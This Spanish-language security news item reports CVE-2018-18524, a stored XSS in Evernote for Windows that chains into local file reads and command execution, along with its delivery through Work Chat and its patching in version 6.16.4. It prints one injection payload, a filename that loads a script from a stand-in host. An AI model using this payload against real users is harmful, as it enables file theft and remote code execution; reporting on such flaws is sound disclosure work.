Una nueva vulnerabilidad XSS persistente en la versión de escritorio de Windows permite ejecutar programas en la máquina de la víctima de forma remota si lo combinas con otros ataques, en este caso Read Local File y Remote Command Execute.
El fallo se produce cuando un usuario añade una imagen a alguna nota. Si cambia el nombre de la imagen por código JavaScript, se ejecuta. Teniendo en cuenta que al guardar la nota queda almacenado el código JavaScript inyectado, nos encontramos con un XSS persistente.
A partir de esta vulnerabilidad es posible realizar otros ataques. Puesto que Evernote utiliza NodeWebKit para sus presentaciones de notas, es posible ejecutar un script desde un servidor remoto escrito en Node.js que lea ficheros en la máquina Windows del usuario que abra la nota en modo presentación.
><script src="http://example.org/bad-javascript.js">.jpg
Un usuario malicioso puede utilizar la opción Work Chat de Evernote para enviar la nota a la víctima y persuadirla para que la abra en modo presentación.
En una POC realizada por TonQing Zhu se muestra cómo explotando esta vulnerabilidad se pueden leer ficheros de la máquina de la víctima, en este caso el fichero ‘win.ini’ y ejecutar programas, como por ejemplo, la calculadora.
Envío de nota por Work Chat de Evernote:
El fallo ha sido clasificado como CVE-2018-18524, y fue parcheado inicialmente en Evernote para Windows 6.16.1 beta en octubre. Y la actualización con el último parche se lanzó a principios de este mes con versión 6.16.4.
Más información:
prodefence.org:
http://www.prodefence.org/xss-flaw-in-evernote-allows-attackers-to-execute-commands-and-steal-files/
movaxbx.ru:
https://movaxbx.ru/2018/11/05/evernote-for-windows-read-local-file-and-command-execute-vulnerabilities/
